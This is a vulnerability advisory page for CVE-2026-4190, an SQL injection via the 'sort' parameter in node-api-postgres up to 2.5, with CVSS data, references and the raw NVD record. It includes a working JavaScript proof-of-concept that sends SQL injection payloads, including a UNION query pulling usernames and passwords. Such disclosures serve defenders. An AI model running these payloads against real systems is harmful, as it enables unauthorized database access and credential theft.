Security Vulnerability Report
CVE-2026-4190 CVSS 7.3 HIGH

CVE-2026-4190

Published: 2026-03-16 14:20:02
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was detected in JawherKl node-api-postgres up to and including version 2.5. It affects the function User.getAll in the file models/user.js: manipulating the `sort` argument results in SQL injection (CWE-89). The attack can be executed remotely and, per the CVSS vector, requires neither privileges nor user interaction. A public exploit exists and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Note: the 7.3 HIGH figure above is the CVSS 3.1 base score. The same NVD record also carries a secondary CVSS 4.0 score of 5.5 MEDIUM (exploit maturity: proof-of-concept) and a CVSS 2.0 score of 7.5 HIGH; see Raw JSON Data below.

Configurations (Affected Products)

No CPE configuration data is available in the NVD record (status: Deferred). The affected range below — all versions up to and including 2.5 — is derived from the advisory description; no fixed version is listed.

JawherKl node-api-postgres < 2.5
JawherKl node-api-postgres = 2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Run it solely against systems you are explicitly authorized to test.
javascript
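// CVE-2026-4190 PoC - SQL injection via the `sort` argument of User.getAll
// (models/user.js) in JawherKl node-api-postgres <= 2.5.
//
// Usage:  POC_TARGET=http://host:port/api/users node poc.js
//    or:  node poc.js http://host:port/api/users
//
// Safety: the original PoC hardcoded http://target-server.com/api/users as the
// target. That is a real, registrable domain, so running the script unmodified
// would send SQL injection payloads to a third party. The target must now be
// supplied explicitly, and the script fails closed when it is missing or is
// not an http(s) URL.
//
// NOTE(review): the advisory names the `sort` argument as the sink. A sort
// parameter is typically interpolated into an ORDER BY clause (an identifier
// context), where the quoted (`1' AND ...`) and UNION payloads below would not
// parse; the stacked-query payload is the one most likely to fit that context.
// Confirm the exact interpolation in models/user.js before relying on any of
// these payload shapes.

'use strict';

// Environment variable naming the target; argv[2] is the fallback.
const TARGET_ENV = 'POC_TARGET';

// Payloads, byte-identical to the original PoC, grouped by technique.
const PAYLOADS = Object.freeze({
  // Stacked query - asks PostgreSQL for its version string.
  stacked: '1; SELECT version();--',
  // Boolean pair - if both responses are identical the oracle is not working.
  blindTrue: "1' AND (SELECT COUNT(*) FROM admin) > 0--",
  blindFalse: "1' AND (SELECT COUNT(*) FROM nonexistent_table) > 0--",
  // UNION - the column count (8) is a guess and must match the users query.
  union: "1' UNION SELECT 1,2,3,username,password,6,7,8 FROM users--",
});

/**
 * Resolve the target URL from `env[POC_TARGET]`, falling back to `argv[2]`.
 *
 * @param {Object<string,string>} [env=process.env] environment to read
 * @param {string[]} [argv=process.argv] command line (argv[2] is the URL)
 * @returns {string|null} normalised http(s) URL, or null when unset or
 *   unparseable so the caller can refuse to run rather than hit a default host
 */
function resolveTarget(env = process.env, argv = process.argv) {
  const fromEnv = env[TARGET_ENV];
  const raw = typeof fromEnv === 'string' && fromEnv.trim() !== '' ? fromEnv : argv[2];
  if (typeof raw !== 'string' || raw.trim() === '') {
    return null;
  }
  let url;
  try {
    url = new URL(raw.trim());
  } catch (error) {
    // Not a URL at all (e.g. a bare hostname) - fail closed.
    return null;
  }
  const isHttp = url.protocol === 'http:' || url.protocol === 'https:';
  return isHttp ? url.toString() : null;
}

/**
 * Decide whether two responses differ in a way a boolean-based oracle can use:
 * either the HTTP status or the (serialised) body differs.
 *
 * @param {{status:number,data:*}} resTrue response for the "true" condition
 * @param {{status:number,data:*}} resFalse response for the "false" condition
 * @returns {boolean} true when the pair is distinguishable
 */
function oracleDiffers(resTrue, resFalse) {
  if (resTrue.status !== resFalse.status) {
    return true;
  }
  return JSON.stringify(resTrue.data) !== JSON.stringify(resFalse.data);
}

/**
 * GET `targetUrl?sort=<payload>` and return the axios response.
 *
 * axios is required lazily so that merely loading this file (e.g. under a
 * test runner) needs neither the dependency installed nor network access.
 * `validateStatus` keeps 4xx/5xx responses: a PostgreSQL error message in the
 * body is itself evidence of injection, and the original PoC threw it away by
 * letting axios reject on non-2xx statuses.
 *
 * @param {string} targetUrl fully-qualified http(s) URL of the users endpoint
 * @param {string} sort value sent as the `sort` query parameter
 * @returns {Promise<{status:number,data:*}>}
 */
async function fetchWithSort(targetUrl, sort) {
  const axios = require('axios');
  return axios.get(targetUrl, {
    params: { sort },
    validateStatus: () => true,
  });
}

// Print one response with its status so error bodies are visible.
function logResponse(label, response) {
  console.log(`${label} [HTTP ${response.status}]:`, response.data);
}

// Basic stacked-query injection - try to extract the database version.
async function basicInjection(targetUrl) {
  try {
    const response = await fetchWithSort(targetUrl, PAYLOADS.stacked);
    logResponse('Response', response);
  } catch (error) {
    console.error('Error:', error.message);
  }
}

// Blind boolean-based injection - check whether an `admin` table exists and
// report whether the two conditions are actually distinguishable.
async function blindInjection(targetUrl) {
  try {
    const responseTrue = await fetchWithSort(targetUrl, PAYLOADS.blindTrue);
    logResponse('True condition response', responseTrue);
    const responseFalse = await fetchWithSort(targetUrl, PAYLOADS.blindFalse);
    logResponse('False condition response', responseFalse);
    console.log(
      oracleDiffers(responseTrue, responseFalse)
        ? 'Responses differ: boolean oracle looks usable.'
        : 'Responses identical: no boolean oracle from this payload pair.',
    );
  } catch (error) {
    console.error('Error:', error.message);
  }
}

// Union-based injection - attempt to read username/password from `users`.
async function unionInjection(targetUrl) {
  try {
    const response = await fetchWithSort(targetUrl, PAYLOADS.union);
    logResponse('Extracted data', response);
  } catch (error) {
    console.error('Error:', error.message);
  }
}

// Entry point: refuse to run without an explicit target, then run the three
// techniques sequentially against it.
async function main() {
  const targetUrl = resolveTarget();
  if (targetUrl === null) {
    console.error(
      `Refusing to run: set ${TARGET_ENV}=http://host:port/api/users or pass the URL as the first argument.`,
    );
    process.exitCode = 2;
    return;
  }
  console.log('CVE-2026-4190 SQL Injection PoC');
  console.log('Target:', targetUrl);
  console.log('---');
  await basicInjection(targetUrl);
  await blindInjection(targetUrl);
  await unionInjection(targetUrl);
}

// Only self-execute when run directly (`node poc.js`); when loaded as a module
// (CommonJS require or an ESM test harness) nothing is sent anywhere.
if (typeof require !== 'undefined' && typeof module !== 'undefined' && require.main === module) {
  main().catch((error) => {
    console.error('Error:', error.message);
    process.exitCode = 1;
  });
}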

References

- https://hackmd.io/@YzU_KiOzT86cEbFQdBceVg/Bk56LQQYbe
- https://vuldb.com/?id.351097
- https://vuldb.com/?ctiid.351097
- https://vuldb.com/?submit.770001
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4190", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:02.193", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in JawherKl node-api-postgres up to 2.5. This impacts the function User.getAll of the file models/user.js. The manipulation of the argument sort results in sql injection. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad fue detectada en JawherKl node-api-postgres hasta 2.5. Esto afecta la función User.getAll del archivo models/user.js. La manipulación del argumento sort resulta en inyección SQL. El ataque puede ser ejecutado remotamente. El exploit ahora es público y puede ser utilizado. El proveedor fue contactado tempranamente sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": 
"NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://hackmd.io/@YzU_KiOzT86cEbFQdBceVg/Bk56LQQYbe", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351097", "source": "[email protected]"}, {"url": 
"https://vuldb.com/?id.351097", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.770001", "source": "[email protected]"}]}}